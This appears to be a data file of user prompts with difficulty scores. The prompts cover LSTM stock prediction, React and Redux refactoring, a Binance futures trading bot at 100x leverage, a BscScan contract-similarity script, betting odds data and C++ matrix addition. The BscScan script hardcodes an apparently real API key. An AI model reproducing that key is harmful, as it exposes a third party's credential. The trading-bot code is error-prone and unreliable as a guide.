testPredict = model.predict(X_test)
trainPredict = scaler.inverse_transform(trainPredict)
y_train = scaler.inverse_transform([y_train])
testPredict = scaler.inverse_transform(testPredict)
y_test = scaler.inverse_transform([y_test])
|
59365c5050bfc914456d07a52ccbd6f0
|
{
"intermediate": 0.40095052123069763,
"beginner": 0.293554425239563,
"expert": 0.3054950535297394
}
|
11,334
|
const Sidebar = () => {
return (
<div className="sidebar">
<div className="sidebarContainer">
<div className="sidebarContainer__menu">
<h3 className="sidebarContainer__title">Dashboard</h3>
<ul className="sidebarContainer__list">
<li className="sidebarContainer__listItem active">
<LineStyle className="sidebarContainer__listIcon" />
Home
</li>
<li className="sidebarContainer__listItem">
<Timeline className="sidebarContainer__listIcon" />
Analytics
</li>
<li className="sidebarContainer__listItem">
<TrendingUp className="sidebarContainer__listIcon" />
Sales
</li>
</ul>
</div>
<div className="sidebarContainer__menu">
<h3 className="sidebarContainer__title">Quick Menu</h3>
<ul className="sidebarContainer__list">
<li className="sidebarContainer__listItem">
<PersonOutline className="sidebarContainer__listIcon" />
Users
</li>
<li className="sidebarContainer__listItem">
<Inventory className="sidebarContainer__listIcon" />
Products
</li>
<li className="sidebarContainer__listItem">
<Paid className="sidebarContainer__listIcon" />
Transactions
</li>
<li className="sidebarContainer__listItem">
<Assessment className="sidebarContainer__listIcon" />
Report
</li>
</ul>
</div>
<div className="sidebarContainer__menu">
<h3 className="sidebarContainer__title">Notifications</h3>
<ul className="sidebarContainer__list">
<li className="sidebarContainer__listItem">
<MailOutline className="sidebarContainer__listIcon" />
Mail
</li>
<li className="sidebarContainer__listItem">
<Forum className="sidebarContainer__listIcon" />
Feedback
</li>
<li className="sidebarContainer__listItem">
<Message className="sidebarContainer__listIcon" />
Message
</li>
</ul>
</div>
<div className="sidebarContainer__menu">
<h3 className="sidebarContainer__title">Staff</h3>
<ul className="sidebarContainer__list">
<li className="sidebarContainer__listItem">
<Work className="sidebarContainer__listIcon" />
Manage
</li>
<li className="sidebarContainer__listItem">
<Timeline className="sidebarContainer__listIcon" />
Analytics
</li>
<li className="sidebarContainer__listItem">
<ReportGmailerrorred className="sidebarContainer__listIcon" />
Report
</li>
</ul>
</div>
</div>
</div>
);
};
refaktor this
|
5f73fdc2508e8028e22c0da15f6acbcc
|
{
"intermediate": 0.35835638642311096,
"beginner": 0.39915207028388977,
"expert": 0.24249158799648285
}
|
11,335
|
Please correct this code from this part:
from sklearn.metrics import mean_squared_error
import math
trainScore = math.sqrt(mean_squared_error(trainY[0], trainPredict[:,0]))
print('Train Score: %.2f RMSE' % (trainScore))
testScore = math.sqrt(mean_squared_error(testY[0], testPredict[:,0]))
print('Test Score: %.2f RMSE' % (testScore))
Code:
import yfinance as yf
import pandas as pd
import numpy as np
from sklearn.preprocessing import MinMaxScaler
from keras.models import Sequential
from keras.layers import Dense, LSTM
from keras.callbacks import LambdaCallback
from keras.regularizers import L1L2
from sklearn.model_selection import TimeSeriesSplit
nifty = yf.download('^NSEI', start='2009-01-01', end='2021-01-01')
def supertrend(df, period=10, multiplier=3):
hl = (df['High'] + df['Low']) / 2
atr = df['High'].rolling(period).max() - df['Low'].rolling(period).min()
up = hl - multiplier * atr
dn = hl + multiplier * atr
df['ST'] = 0
df['ST'][0] = (df['High'][0] + df['Low'][0]) / 2
position = 'none'
for i in range(1, len(df)):
if df['Close'][i] > up[i]:
if position != 'buy':
position = 'buy'
df['ST'][i] = dn[i]
else:
df['ST'][i] = max(df['ST'][i - 1], dn[i])
elif df['Close'][i] < dn[i]:
if position != 'sell':
position = 'sell'
df['ST'][i] = up[i]
else:
df['ST'][i] = min(df['ST'][i - 1], up[i])
else:
df['ST'][i] = df['ST'][i - 1]
return df
nifty = supertrend(nifty)
nifty.head()
dataset = nifty['Close'].values
dataset = dataset.astype('float32')
dataset = dataset.reshape(-1, 1)
scaler = MinMaxScaler(feature_range=(0, 1))
dataset = scaler.fit_transform(dataset)
def create_dataset(dataset, look_back=1):
dataX, dataY = [], []
for i in range(len(dataset)-look_back-1):
a = dataset[i:(i+look_back), 0]
dataX.append(a)
dataY.append(dataset[i + look_back, 0])
return np.array(dataX), np.array(dataY)
look_back = 1
X, y = create_dataset(dataset, look_back)
X = np.reshape(X, (X.shape[0], 1, X.shape[1]))
# 1. Increasing the size of training data
train_size = int(len(X) * 0.9)
test_size = len(X) - train_size
X_train, X_test = X[:train_size], X[train_size:]
y_train, y_test = y[:train_size], y[train_size:]
# 4. Cross-validation
tscv = TimeSeriesSplit(n_splits=5)
for train_index, test_index in tscv.split(X_train):
X_train_cv, X_valid_cv = X_train[train_index], X_train[test_index]
y_train_cv, y_valid_cv = y_train[train_index], y_train[test_index]
# 3. Simplifying the model -reduce layers or use smaller layers
model = Sequential()
model.add(LSTM(50, input_shape=(1, look_back), kernel_regularizer=L1L2(l1=0.0, l2=0.1)))
model.add(Dense(1))
# 2. Regularization
model.compile(loss='mean_squared_error', optimizer='adam')
model.fit(X_train_cv, y_train_cv, epochs=5, batch_size=1, verbose=0, validation_data=(X_valid_cv, y_valid_cv))
trainPredict = model.predict(X_train)
testPredict = model.predict(X_test)
trainPredict = scaler.inverse_transform(trainPredict)
y_train = scaler.inverse_transform([y_train])
testPredict = scaler.inverse_transform(testPredict)
y_test = scaler.inverse_transform([y_test])
trainPredictPlot = np.empty_like(dataset)
trainPredictPlot[:, :] = np.nan
trainPredictPlot[look_back:len(trainPredict)+look_back, :] = trainPredict
# Shift test predictions for plotting
testPredictPlot = np.empty_like(dataset)
testPredictPlot[:, :] = np.nan
total_len = len(dataset) - len(testPredict) - 1
testPredictPlot[total_len:len(dataset)-1, :] = testPredict
# Plot baseline and predictions
plt.figure(figsize=(12,6))
plt.plot(scaler.inverse_transform(dataset), label='Actual')
plt.plot(trainPredictPlot, label='Train Prediction')
plt.plot(testPredictPlot, label='Test Prediction')
plt.xlabel('Time Index')
plt.ylabel('Stock Price')
plt.legend(loc='upper left')
plt.title('Actual vs Predicted Stock Prices')
plt.show()
model.save('my_model.h5')
from sklearn.metrics import mean_squared_error
import math
trainScore = math.sqrt(mean_squared_error(trainY[0], trainPredict[:,0]))
print('Train Score: %.2f RMSE' % (trainScore))
testScore = math.sqrt(mean_squared_error(testY[0], testPredict[:,0]))
print('Test Score: %.2f RMSE' % (testScore))
# 1. Take the last look_back days (last day in this case) of the dataset
last_day = dataset[-look_back:]
# 2. Scale the input using the fitted MinMaxScaler
last_day_scaled = scaler.transform(last_day)
# 3. Reshape the input to match the required model input shape
last_day_scaled_reshaped = np.reshape(last_day_scaled, (1, 1, look_back))
# 4. Use model.predict() to predict the scaled value for ‘2021-01-02’
next_day_scaled_prediction = model.predict(last_day_scaled_reshaped)
# 5. Inverse-transform the predicted scaled value to the original range using the MinMaxScaler
next_day_prediction = scaler.inverse_transform(next_day_scaled_prediction)
# 6. Print or use the predicted value
print("Prediction for 2021-01-02: ", next_day_prediction[0][0])
|
1508cc4933c25d938c56fc332e70a617
|
{
"intermediate": 0.41953906416893005,
"beginner": 0.38105329871177673,
"expert": 0.1994076669216156
}
|
11,336
|
const LeveragePage: NextPage = () => {
const [leverages, setLeverages] = useState<Array<Leverage>>([]);
const [filteredLeverages, setFilteredLeverages] = useState<Array<Leverage>>([]);
const [searchInputValue, setSearchInputValue] = useState("");
const [localChangedLeverage, setLocalChangedLeverage] = useState<{symbol: string, value: number|undefined}>({
symbol: "symbol",
value: undefined,
});
const onChangeLeverage = (symbol: string, value: number|undefined) => {
setLocalChangedLeverage({symbol, value});
};
useEffect(() => {
if (undefined !== localChangedLeverage.value) {
setChangedLeverages({
...changedLeverages,
[localChangedLeverage.symbol]: localChangedLeverage.value,
});
} else {
setChangedLeverages(Object.keys(changedLeverages).reduce(
(acc, key) => {
return key === localChangedLeverage.symbol
? acc
: {...acc, [key]: changedLeverages[key]};
},
{},
));
}
}, [localChangedLeverage]);
return {
filteredLeverages.map((leverage, index) => {
return <Grid item sm={12} md={4} key={leverage.symbol}>
<LeverageForm
index={index}
leverage={leverage}
selected={undefined !== changedLeverages[leverage.symbol]}
onChange={onChangeLeverage}
value={changedLeverages[leverage.symbol]}
/>
</Grid>;
})
}
};
export default LeveragePage;
const LeverageForm = memo(
function LeverageForm(
{leverage, index, value, selected, onChange}: LeverageFormProps
) {
const [leverageValue, setLeverageValue] = useState<number>(value || leverage.leverage);
const [checked, setChecked] = useState(selected);
useEffect(() => {
onChange(leverage.symbol, checked ? leverageValue : undefined);
}, [leverageValue, checked]);
useEffect(() => {
if (!checked && leverage.leverage !== leverageValue) {
setChecked(true);
}
}, [leverageValue]);
useEffect(() => {
if (checked !== selected) {
setChecked(selected);
if (!selected) {
setLeverageValue(leverage.leverage);
}
}
}, [selected]);
import { createSlice } from "@reduxjs/toolkit";
import {HYDRATE} from "next-redux-wrapper";
import { Leverage } from "../actions/cicap-diary-trades";
interface LeverageSlice {
leverage: { [key: string]: Leverage },
}
const initialState: LeverageSlice = {
leverage: {},
};
export const leverageSlice = createSlice({
name: "leverageSlice",
initialState,
reducers: {
setLeverage(state, action) {
state.leverage = action.payload;
},
},
extraReducers: {
[HYDRATE]: (state, action) => {
return {
...state,
...action.payload,
};
},
},
});
export const {
setLeverage,
} = leverageSlice.actions;
export default leverageSlice.reducer;
1. В редаксе у leverages должен быть тип например {[key: string]: Leverage}, где в key хранится symbol.
Тогда в LeverageForm можно передать только symbol и index. Доставать данные уже внутри LeverageForm по symbol:
const leverages = useSelector((state: AppState) => state.leverageSlice.leverages[symbol]);
Тогда LeverageForm будет ререндериться только при изменении плеча по его монете.
2. changed можно сделать свойством объекта Leverage.
3. Такой момент еще. В pages/leverage.tsx используется выборка:
const leverages = useSelector((state: AppState) => state.leverageSlice.leverages);
Она нужна по большей степени для того, чтобы запустить перебор по всем доступным плечам. При любом изменении в плечах этот компонент (страница) будет перерендериваться и соответственно все дочерние компоненты. Поэтому нужно в стейт добавить symbols: Array<string>. И заполнять этот массив в момент получения всех доступных плеч с бека. На странице вытягивать только symbols и перебирать его.
|
0eb02360a5d948611927b7b935f5b5d0
|
{
"intermediate": 0.3125772476196289,
"beginner": 0.5769684910774231,
"expert": 0.11045430600643158
}
|
11,337
|
given this this array `[ {
"underdog": {
"line": 1.6,
"true_prob": null,
"direction": null,
"slip_selections": {
"over": {
"id": "226cfceb-d6cb-4c35-bc14-e7a16a583c33",
"choice": "higher",
"choice_display": "Higher",
"over_under_line_id": "bb6c2adc-95f6-4650-99cc-a7e34d9b3a17",
"type": "OverUnderOption"
},
"under": {
"id": "c3a3d856-f229-4cde-86dd-8151b7a1e95c",
"choice": "lower",
"choice_display": "Lower",
"over_under_line_id": "bb6c2adc-95f6-4650-99cc-a7e34d9b3a17",
"type": "OverUnderOption"
}
}
},
"prizepicks": {
"line": 1.5,
"true_prob": null,
"direction": null,
"slip_selections": {
"over": {
"wager_type": "over",
"projection_id": "1380602"
},
"under": {
"wager_type": "under",
"projection_id": "1380602"
}
}
},
"draftkings": {
"line": 1.5,
"true_prob": null,
"direction": null,
"slip_selections": null
},
"player_name": "Matthew Boyd",
"market_name": "Walks Allowed"
}] ` detect when the `line` is different from other others in the dictionary. In this case, the line in `underdog` is higher so return the underdog dictionary.
|
a01bfe6e3b873bb16bde687046af1746
|
{
"intermediate": 0.324043333530426,
"beginner": 0.4373980164527893,
"expert": 0.23855865001678467
}
|
11,338
|
I sued this code: import time
from binance.client import Client
from binance.enums import *
from binance.exceptions import BinanceAPIException
from binance.helpers import round_step_size
import pandas as pd
import json
import numpy as np
import pytz
import datetime as dt
import ccxt
from decimal import Decimal
import requests
import hmac
import hashlib
import ntplib
import os
from ta import trend, momentum
API_KEY = ''
API_SECRET = ''
client = Client(API_KEY, API_SECRET)
# Set the endpoint and parameters for the request
url = "https://fapi.binance.com/fapi/v2/account"
timestamp = int(time.time() * 1000)
recv_window = 5000
params = {
"timestamp": timestamp,
"recvWindow": recv_window
}
# Sign the message using the Client’s secret key
message = '&'.join([f"{k}={v}" for k, v in params.items()])
signature = hmac.new(API_SECRET.encode(), message.encode(), hashlib.sha256).hexdigest()
params['signature'] = signature
leverage = 100
# Send the request using the requests library
response = requests.get(url, params=params, headers={'X-MBX-APIKEY': API_KEY})
account_info = response.json()
# Get the USDT balance and calculate the max trade size based on the leverage
try:
usdt_balance = next((item for item in account_info['accountBalance'] if item["asset"] == "USDT"), {"free": 0})['free']
except KeyError:
usdt_balance = 0
print("Error: Could not retrieve USDT balance from API response.")
max_trade_size = float(usdt_balance) * leverage
# Get the current time and timestamp
now = dt.datetime.now()
date = now.strftime("%m/%d/%Y %H:%M:%S")
print(date)
timestamp = int(time.time() * 1000)
STOP_LOSS_PERCENTAGE = -50
TAKE_PROFIT_PERCENTAGE = 100
MAX_TRADE_QUANTITY_PERCENTAGE = 100
POSITION_SIDE_SHORT = 'SELL'
POSITION_SIDE_LONG = 'BUY'
quantity = 1
symbol = 'BTC/USDT'
order_type = 'market'
leverage = 100
max_trade_quantity_percentage = 1
binance_futures = ccxt.binance({
'apiKey': API_KEY,
'secret': API_SECRET,
'enableRateLimit': True, # enable rate limitation
'options': {
'defaultType': 'future',
'adjustForTimeDifference': True
},'future': {
'sideEffectType': 'MARGIN_BUY', # MARGIN_BUY, AUTO_REPAY, etc…
}
})
# Load the market symbols
def sync_time():
ntp_client = ntplib.NTPClient()
response = ntp_client.request('pool.ntp.org', version=3)
now = time.time()
offset = response.offset
new_time = now + offset
# Set the system clock to the new time
os.system(f'sudo date -s @{int(new_time)}')
print(f'New time: {dt.datetime.now()}')
recv_window = 10000
params = {
"timestamp": timestamp,
"recvWindow": recv_window
}
try:
markets = binance_futures.load_markets()
except ccxt.BaseError as e:
print(f'Error fetching markets: {e}')
markets = []
if symbol in markets:
print(f"{symbol} found in the market")
else:
print(f"{symbol} not found in the market")
# Get server time and time difference
def get_server_time(exchange):
return exchange.fetch_time()
def get_time_difference():
server_time = get_server_time(binance_futures)
local_time = int(time.time() * 1000)
time_difference = local_time - server_time
return time_difference
time.sleep(1)
def get_klines(symbol, interval, lookback):
url = "https://fapi.binance.com/fapi/v1/klines"
end_time = int(time.time() * 1000) # end time is now
start_time = end_time - (lookback * 60 * 1000) # start time is lookback minutes ago
symbol = symbol.replace("/", "") # remove slash from symbol
query_params = f"?symbol={symbol}&interval={interval}&startTime={start_time}&endTime={end_time}"
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'
}
response = requests.get(url + query_params, headers=headers)
response.raise_for_status()
data = response.json()
if not data: # if data is empty, return None
print('No data found for the given timeframe and symbol')
return None
ohlc = []
for d in data:
timestamp = dt.datetime.fromtimestamp(d[0]/1000).strftime('%Y-%m-%d %H:%M:%S')
ohlc.append({
'Open time': timestamp,
'Open': float(d[1]),
'High': float(d[2]),
'Low': float(d[3]),
'Close': float(d[4]),
'Volume': float(d[5])
})
df = pd.DataFrame(ohlc)
df.set_index('Open time', inplace=True)
return df
df = get_klines(symbol, '1m', 44640)
# Define signal generator function
def signal_generator(symbol, interval='1m'):
# Get historical data
klines = client.get_historical_trades(symbol, interval, "1000 hours ago UTC")
df = pd.DataFrame(klines, columns=['timestamp', 'open', 'high', 'low', 'close', 'volume', 'close_time', 'quote_asset_volume', 'num_trades', 'taker_buy_base_asset_volume', 'taker_buy_quote_asset_volume', 'ignore'])
# Convert data to appropriate format
df['timestamp'] = pd.to_datetime(df['timestamp'], unit='ms')
df.set_index('timestamp', inplace=True)
df = df.astype(float)
# Calculate technical indicators
df['SMA_20'] = trend.sma_indicator(df['close'], window=20)
df['SMA_50'] = trend.sma_indicator(df['close'], window=50)
df['RSI'] = momentum.rsi(df['close'], window=14)
# Define signal conditions based on technical indicators
if df['SMA_20'][-1] > df['SMA_50'][-1] and df['SMA_20'][-2] <= df['SMA_50'][-2] and df['RSI'][-1] > 50:
return 'buy'
elif df['SMA_20'][-1] < df['SMA_50'][-1] and df['SMA_20'][-2] >= df['SMA_50'][-2] and df['RSI'][-1] < 50:
return 'sell'
else:
return ''
df = signal_generator(symbol, interval='1m')
def order_execution(symbol, signal, step_size, leverage, order_type):
# Set default value for response
response = {}
# Close any existing positions
current_position = None
positions = binance_futures.fapiPrivateGetPositionRisk()
for position in positions:
if position["symbol"] == symbol:
current_position = position
if current_position is not None and current_position["positionAmt"] != 0:
response = binance_futures.fapiPrivatePostOrder(
symbol=symbol,
side='SELL' if current_position['positionSide'] == 'LONG' else 'BUY',
type='MARKET',
quantity=abs(float(current_position['positionAmt'])),
positionSide=current_position['positionSide'],
reduceOnly=True
)
if 'orderId' in response:
print(f'Closed position: {response}')
else:
print(f'Error closing position: {response}')
time.sleep(1)
# Calculate appropriate order quantity and price based on signal
opposite_position = None
quantity = step_size
position_side = None #initialise to None
price = None
# Set default take profit price
take_profit_price = None
stop_loss_price = None
if signal == 'buy':
position_side = 'BOTH'
opposite_position = current_position if current_position and current_position['positionSide'] == 'SHORT' else None
order_type = 'TAKE_PROFIT_MARKET'
ticker = binance_futures.fetch_ticker(symbol)
price = 0 # default price
if 'ask' in ticker:
price = ticker['ask']
# perform rounding and other operations on price
else:
# handle the case where the key is missing (e.g. raise an exception, skip this signal, etc.)
take_profit_percentage = TAKE_PROFIT_PERCENTAGE
stop_loss_percentage = STOP_LOSS_PERCENTAGE
elif signal == 'sell':
position_side = 'BOTH'
opposite_position = current_position if current_position and current_position['positionSide'] == 'LONG' else None
order_type = 'STOP_MARKET'
ticker = binance_futures.fetch_ticker(symbol)
price = 0 # default price
if 'bid' in ticker:
price = ticker['bid']
# perform rounding and other operations on price
else:
# handle the case where the key is missing (e.g. raise an exception, skip this signal, etc.)
take_profit_percentage = TAKE_PROFIT_PERCENTAGE
stop_loss_percentage = STOP_LOSS_PERCENTAGE
# Set stop loss price
stop_loss_price = None
if price is not None:
price = round_step_size(price, step_size=step_size)
if signal == 'buy':
# Calculate take profit and stop loss prices for a buy signal
take_profit_price = round_step_size(price * (1 + TAKE_PROFIT_PERCENTAGE / 100), step_size=step_size)
stop_loss_price = round_step_size(price * (1 - STOP_LOSS_PERCENTAGE / 100), step_size=step_size)
elif signal == 'sell':
# Calculate take profit and stop loss prices for a sell signal
take_profit_price = round_step_size(price * (1 - TAKE_PROFIT_PERCENTAGE / 100), step_size=step_size)
stop_loss_price = round_step_size(price * (1 + STOP_LOSS_PERCENTAGE / 100), step_size=step_size)
# Placing new order
api_method = 'fapiPrivatePostOrder'
params = {
'symbol': symbol,
'side': signal.upper(),
'type': order_type,
'quantity': quantity,
'positionSide': position_side,
'leverage': leverage,
'price': price,
'stopPrice': stop_loss_price,
'takeProfit': take_profit_price
}
response = getattr(binance_futures, api_method)(params=params)
if 'orderId' in response:
print(f'Order placed: {response}')
else:
print(f'Error placing order: {response}')
time.sleep(1)
return response
signal = signal_generator(df)
while True:
df = get_klines(symbol, '1m', 44640) # await the coroutine function here
if df is not None:
signal = signal_generator(df)
if signal is not None:
print(f"The signal time is: {dt.datetime.now().strftime('%Y-%m-%d %H:%M:%S')}:{signal}")
time.sleep(1)
But I getting ERROR: Error: Could not retrieve USDT balance from API response.
06/10/2023 20:42:07
BTC/USDT found in the market
Traceback (most recent call last):
File "c:\Users\Alan\.vscode\jew_bot\jew_bot\jew_bot.py", line 175, in <module>
df = signal_generator(symbol, interval='1m')
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "c:\Users\Alan\.vscode\jew_bot\jew_bot\jew_bot.py", line 155, in signal_generator
klines = client.get_historical_trades(symbol, interval, "1000 hours ago UTC")
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
TypeError: define_getter.<locals>.getter() takes 1 positional argument but 4 were given
|
1c6c86fdf9ea4242d6a837ae4fbd0b3b
|
{
"intermediate": 0.47572600841522217,
"beginner": 0.3873351812362671,
"expert": 0.13693876564502716
}
|
11,339
|
how to unit test a chart (System.Windows.Controls.DataVisualization.Charting.Chart chart) saved to a .png file? Can I create a temp chart with a random data?
|
12456fe050099536cf6519c352719113
|
{
"intermediate": 0.57755047082901,
"beginner": 0.1972118616104126,
"expert": 0.2252376824617386
}
|
11,340
|
# Сравнивает исходный код контракта токена
# Комментарии в коде в расчет не берутся
import re
import requests
API_KEY = "CXTB4IUT31N836G93ZI3YQBEWBQEGGH5QS"
BASE_URL = "https://api.bscscan.com/api"
def remove_comments(source_code):
# Remove single-line comments
source_code = re.sub(r"//.", "", source_code)
# Remove multi-line comments
source_code = re.sub(r" / *[\s\S]? * / ", "", source_code)
return source_code
def get_contract_source_code(address):
params = {
"module": "contract",
"action": "getsourcecode",
"address": address,
"apiKey": API_KEY
}
response = requests.get(BASE_URL, params=params)
data = response.json()
if data["status"] == "1":
source_code = data["result"][0]["SourceCode"]
return remove_comments(source_code)
else:
return None
def find_similar_contracts(reference_addresses, candidate_addresses):
reference_source_codes = {}
for reference_address in reference_addresses:
source_code = get_contract_source_code(reference_address)
if source_code is not None:
reference_source_codes[reference_address] = source_code
if not reference_source_codes:
print("No source code found for reference contracts")
return []
similar_contracts = {}
for address in candidate_addresses:
candidate_source_code = get_contract_source_code(address)
if candidate_source_code is not None:
for reference_address, reference_source_code in reference_source_codes.items():
if candidate_source_code == reference_source_code:
if reference_address not in similar_contracts:
similar_contracts[reference_address] = [address]
else:
similar_contracts[reference_address].append(address)
return similar_contracts
if __name__ == "__main__":
# Replace this list with a list of reference contract addresses to check
reference_addresses = ["0x4401E60E39F7d3F8D5021F113306AF1759a6c168", "0x2023aa62a7570ffd59f13fde2cac0527d45abf91",
"0x445645eC7c2E66A28e50fbCF11AAa666290Cd5bb", "0x1f5FbCF2787140b2F05081Fd9f69Bc0F436B13C1",
"0x735204a9420af122142a18F03464Bc311CDEA95B", "0x82b12a2ca1B8003ED7249C88Bb2B7221809AcAc4",
"0x03c5610C0749a16f2B05C53A26220cc872918fd4"]
# Replace this list with a list of candidate contract addresses to check
# For example, you can fetch a list of contracts created recently using another BscScan API endpoint
candidate_addresses = ["0x4401E60E39F7d3F8D5021F113306AF1759a6c168"]
similar_contracts = find_similar_contracts(reference_addresses, candidate_addresses)
print("Contracts with similar source code (ignoring comments):")
for reference_address, similar_addresses in similar_contracts.items():
print(f"Reference contract: {reference_address}")
for address in similar_addresses:
print(f"Similar contract: {address}")
The code above only detects contracts that are completely identical to each other.
Change the code so that it also detects contracts that are as similar as possible to each other
|
e639d84988ee0088694662d3e0b1b9fb
|
{
"intermediate": 0.2669708728790283,
"beginner": 0.4960957169532776,
"expert": 0.2369333803653717
}
|
11,341
|
Hi there
|
0833bc157e440cdfbe26ae34cb46f01e
|
{
"intermediate": 0.32728445529937744,
"beginner": 0.24503648281097412,
"expert": 0.42767903208732605
}
|
11,342
|
given this input `[ {
"underdog": {
"line": 99.5,
"true_prob": null,
"direction": null,
"slip_selections": {
"over": {
"id": "bf1c47ce-c3da-468a-a013-92ca36c84aed",
"choice": "higher",
"choice_display": "Higher",
"over_under_line_id": "137a976c-fdd2-461a-a032-5facd80693e8",
"type": "OverUnderOption"
},
"under": {
"id": "6cfdf1c8-d440-4e10-a9e9-8f856c97f4a1",
"choice": "lower",
"choice_display": "Lower",
"over_under_line_id": "137a976c-fdd2-461a-a032-5facd80693e8",
"type": "OverUnderOption"
}
}
},
"prizepicks": {
"line": 98.5,
"true_prob": null,
"direction": null,
"slip_selections": {
"over": {
"wager_type": "over",
"projection_id": "1380149"
},
"under": {
"wager_type": "under",
"projection_id": "1380149"
}
}
},
"parlayplay": {
"line": 98.5,
"true_prob": null,
"direction": null,
"slip_selections": {
"over": {
"playerId": 1755982,
"playerName": "Kodai Senga",
"teamId": 6196,
"matchId": 524494,
"value": 98.5,
"matchPeriod": "",
"challengeName": "Pitches Thrown",
"challengeOption": "bab_pitchesThrown",
"matchPeriods": [
"FG"
],
"option": 1,
"updated": ""
},
"under": {
"playerId": 1755982,
"playerName": "Kodai Senga",
"teamId": 6196,
"matchId": 524494,
"value": 98.5,
"matchPeriod": "",
"challengeName": "Pitches Thrown",
"challengeOption": "bab_pitchesThrown",
"matchPeriods": [
"FG"
],
"option": 0,
"updated": ""
}
}
},
"player_name": "Kodai Senga",
"market_name": "Pitch Count"
},
{
"underdog": {
"line": 92.5,
"true_prob": null,
"direction": null,
"slip_selections": {
"over": {
"id": "90105b16-dc67-4110-94dc-8ee0aa9e20d1",
"choice": "higher",
"choice_display": "Higher",
"over_under_line_id": "0a06c311-3fa2-42d7-a071-07b408134dd6",
"type": "OverUnderOption"
},
"under": {
"id": "f0e4bbc2-7999-421e-b227-e9cab2d8195e",
"choice": "lower",
"choice_display": "Lower",
"over_under_line_id": "0a06c311-3fa2-42d7-a071-07b408134dd6",
"type": "OverUnderOption"
}
}
},
"prizepicks": {
"line": 93.5,
"true_prob": null,
"direction": null,
"slip_selections": {
"over": {
"wager_type": "over",
"projection_id": "1380148"
},
"under": {
"wager_type": "under",
"projection_id": "1380148"
}
}
},
"parlayplay": {
"line": 93.5,
"true_prob": null,
"direction": null,
"slip_selections": {
"over": {
"playerId": 839212,
"playerName": "Johan Oviedo",
"teamId": 6185,
"matchId": 524494,
"value": 93.5,
"matchPeriod": "",
"challengeName": "Pitches Thrown",
"challengeOption": "bab_pitchesThrown",
"matchPeriods": [
"FG"
],
"option": 1,
"updated": ""
},
"under": {
"playerId": 839212,
"playerName": "Johan Oviedo",
"teamId": 6185,
"matchId": 524494,
"value": 93.5,
"matchPeriod": "",
"challengeName": "Pitches Thrown",
"challengeOption": "bab_pitchesThrown",
"matchPeriods": [
"FG"
],
"option": 0,
"updated": ""
}
}
},
"player_name": "Johan Oviedo",
"market_name": "Pitch Count"
}] ` return the dictionary that has the mismatched line in the case of Kodai Senga it will return the underdog dictionary of data
|
a061650ff85f0508ed288056bf40a041
|
{
"intermediate": 0.3107140064239502,
"beginner": 0.4510822296142578,
"expert": 0.2382037192583084
}
|
11,343
|
2d addition matrix in c++
|
12163f50e4fa9603644848493a34402e
|
{
"intermediate": 0.30872827768325806,
"beginner": 0.2576105296611786,
"expert": 0.43366119265556335
}
|
11,344
|
I used this code: import time
from binance.client import Client
from binance.enums import *
from binance.exceptions import BinanceAPIException
from binance.helpers import round_step_size
import pandas as pd
import json
import numpy as np
import pytz
import datetime as dt
import ccxt
from decimal import Decimal
import requests
import hmac
import hashlib
import ntplib
import os
from ta import trend, momentum
API_KEY = ''
API_SECRET = ''
client = Client(API_KEY, API_SECRET)
# Set the endpoint and parameters for the request
url = "https://fapi.binance.com/fapi/v2/account"
timestamp = int(time.time() * 1000)
recv_window = 5000
params = {
"timestamp": timestamp,
"recvWindow": recv_window
}
# Sign the message using the Client’s secret key
message = '&'.join([f"{k}={v}" for k, v in params.items()])
signature = hmac.new(API_SECRET.encode(), message.encode(), hashlib.sha256).hexdigest()
params['signature'] = signature
leverage = 100
# Send the request using the requests library
response = requests.get(url, params=params, headers={'X-MBX-APIKEY': API_KEY})
account_info = response.json()
# Get the USDT balance and calculate the max trade size based on the leverage
try:
usdt_balance = next((item for item in account_info['accountBalance'] if item["asset"] == "USDT"), {"free": 0})['free']
except KeyError:
usdt_balance = 0
print("Error: Could not retrieve USDT balance from API response.")
max_trade_size = float(usdt_balance) * leverage
# Get the current time and timestamp
now = dt.datetime.now()
date = now.strftime("%m/%d/%Y %H:%M:%S")
print(date)
timestamp = int(time.time() * 1000)
STOP_LOSS_PERCENTAGE = -50
TAKE_PROFIT_PERCENTAGE = 100
MAX_TRADE_QUANTITY_PERCENTAGE = 100
POSITION_SIDE_SHORT = 'SELL'
POSITION_SIDE_LONG = 'BUY'
quantity = 1
symbol = 'BTC/USDT'
order_type = 'market'
leverage = 100
max_trade_quantity_percentage = 1
binance_futures = ccxt.binance({
'apiKey': API_KEY,
'secret': API_SECRET,
'enableRateLimit': True, # enable rate limitation
'options': {
'defaultType': 'future',
'adjustForTimeDifference': True
},'future': {
'sideEffectType': 'MARGIN_BUY', # MARGIN_BUY, AUTO_REPAY, etc…
}
})
# Load the market symbols
def sync_time():
ntp_client = ntplib.NTPClient()
response = ntp_client.request('pool.ntp.org', version=3)
now = time.time()
offset = response.offset
new_time = now + offset
# Set the system clock to the new time
os.system(f'sudo date -s @{int(new_time)}')
print(f'New time: {dt.datetime.now()}')
recv_window = 10000
params = {
"timestamp": timestamp,
"recvWindow": recv_window
}
try:
markets = binance_futures.load_markets()
except ccxt.BaseError as e:
print(f'Error fetching markets: {e}')
markets = []
if symbol in markets:
print(f"{symbol} found in the market")
else:
print(f"{symbol} not found in the market")
# Get server time and time difference
def get_server_time(exchange):
return exchange.fetch_time()
def get_time_difference():
server_time = get_server_time(binance_futures)
local_time = int(time.time() * 1000)
time_difference = local_time - server_time
return time_difference
time.sleep(1)
def get_klines(symbol, interval, lookback):
url = "https://fapi.binance.com/fapi/v1/klines"
end_time = int(time.time() * 1000) # end time is now
start_time = end_time - (lookback * 60 * 1000) # start time is lookback minutes ago
symbol = symbol.replace("/", "") # remove slash from symbol
query_params = f"?symbol={symbol}&interval={interval}&startTime={start_time}&endTime={end_time}"
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'
}
response = requests.get(url + query_params, headers=headers)
response.raise_for_status()
data = response.json()
if not data: # if data is empty, return None
print('No data found for the given timeframe and symbol')
return None
ohlc = []
for d in data:
timestamp = dt.datetime.fromtimestamp(d[0]/1000).strftime('%Y-%m-%d %H:%M:%S')
ohlc.append({
'Open time': timestamp,
'Open': float(d[1]),
'High': float(d[2]),
'Low': float(d[3]),
